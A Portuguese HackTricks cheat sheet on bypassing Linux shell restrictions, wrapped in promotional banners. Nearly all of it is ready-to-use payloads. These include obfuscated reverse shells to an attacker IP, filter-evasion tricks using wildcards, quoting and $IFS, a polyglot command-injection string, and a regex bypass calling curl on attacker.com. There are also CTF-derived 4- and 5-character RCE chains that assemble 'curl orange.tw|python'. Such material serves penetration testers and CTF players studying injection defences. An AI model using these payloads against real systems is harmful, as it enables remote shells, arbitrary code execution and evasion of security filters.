# Bypass de Restrições no Linux
Aprenda hacking AWS do zero ao avançado com htARTE (HackTricks AWS Red Team Expert)! Outras formas de apoiar o HackTricks: * Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
\ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** com facilidade, alimentados pelas ferramentas comunitárias **mais avançadas** do mundo.\ Acesse hoje: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Bypasses Comuns de Limitações ### Shell Reverso ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` ### Shell reverso curto ```bash #Trick from Dikline #Get a rev shell with (sh)0>/dev/tcp/10.10.10.10/443 #Then get the out of the rev shell executing inside of it: exec >&0 ``` ### Bypassar caminhos e palavras proibidas ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost # Wildcard(*) binary substitution /usr/bin/who*mi # /usr/bin/whoami # Wildcard + local directory arguments touch -- -la # -- stops processing options after the -- ls * echo * #List current files and folders with echo and wildcard # [chars] /usr/bin/n[c] # /usr/bin/nc # Quotes 'p'i'n'g # ping "w"h"o"a"m"i # whoami ech''o test # echo test ech""o test # echo test bas''e64 # base64 #Backslashes \u\n\a\m\e \-\a # uname -a /\b\i\n/////s\h # $@ who$@ami #whoami # Transformations (case, reverse, base64) $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case $(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash) $(rev<<<'imaohw') #whoami bash<<<$(base64 -d<< /tmp/[ chmod +x [ export PATH=/tmp:$PATH if [ "a" ]; then echo 1; fi # Will print hello! ``` ### Injeção de Comando Poliglota ```bash 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ ``` ### Bypassar regexes potenciais ```bash # A regex that only allow letters and numbers might be vulnerable to new line characters 1%0a`curl http://attacker.com` ``` ### Bashfuscator ```bash # From https://github.com/Bashfuscator/Bashfuscator ./bashfuscator -c 'cat /etc/passwd' ``` ### RCE com 5 caracteres ```bash # From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge #Oragnge Tsai solution ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date http://host/?cmd=>ls\ http://host/?cmd=ls>_ http://host/?cmd=>\ \ http://host/?cmd=>-t\ http://host/?cmd=>\>g http://host/?cmd=ls>>_ ## Step2: generate `curl orange.tw|python` to file "g" ## by creating the necesary filenames and writting that content to file "g" executing the previous generated file http://host/?cmd=>on http://host/?cmd=>th\ http://host/?cmd=>py\ http://host/?cmd=>\|\ http://host/?cmd=>tw\ http://host/?cmd=>e.\ http://host/?cmd=>ng\ http://host/?cmd=>ra\ http://host/?cmd=>o\ http://host/?cmd=>\ \ http://host/?cmd=>rl\ http://host/?cmd=>cu\ http://host/?cmd=sh _ # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file ## Finally execute the file "g" http://host/?cmd=sh g # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ # Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*" https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ ## Execute tar command over a folder http://52.199.204.34/?cmd=>tar http://52.199.204.34/?cmd=>zcf http://52.199.204.34/?cmd=>zzz http://52.199.204.34/?cmd=*%20/h* # Another curiosity if you can read files of the current folder ln /f* ## If there is a file /flag.txt that will create a hard link ## to it in the current folder ``` ### RCE com 4 caracteres ```bash # In a similar fashion to the previous bypass this one just need 4 chars to execute commands # it will follow the same principle of creating the command `ls -t>g` in a file # and then generate the full command in filenames # generate "g> ht- sl" to file "v" '>dir' '>sl' '>g\>' '>ht-' '*>v' # reverse file "v" to file "x", content "ls -th >g" '>rev' '*v>x' # generate "curl orange.tw|python;" '>\;\\' '>on\\' '>th\\' '>py\\' '>\|\\' '>tw\\' '>e.\\' '>ng\\' '>ra\\' '>o\\' '>\ \\' '>rl\\' '>cu\\' # got shell 'sh x' 'sh g' ``` ## Bypass de Restrições de Bash Se você estiver dentro de um sistema de arquivos com as proteções de **somente leitura e noexec** ou até mesmo em um contêiner distroless, ainda existem maneiras de **executar binários arbitrários, até mesmo um shell!:** {% content-ref url="../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/" %} [bypass-fs-protections-read-only-no-exec-distroless](../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/) {% endcontent-ref %} ## Bypass de Chroot e Outras Jaulas {% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md) {% endcontent-ref %} ## Referências e Mais * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) * [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) * [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) * [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
\ Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente com as ferramentas comunitárias mais avançadas do mundo.\ Acesse hoje: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras maneiras de apoiar o HackTricks: * Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).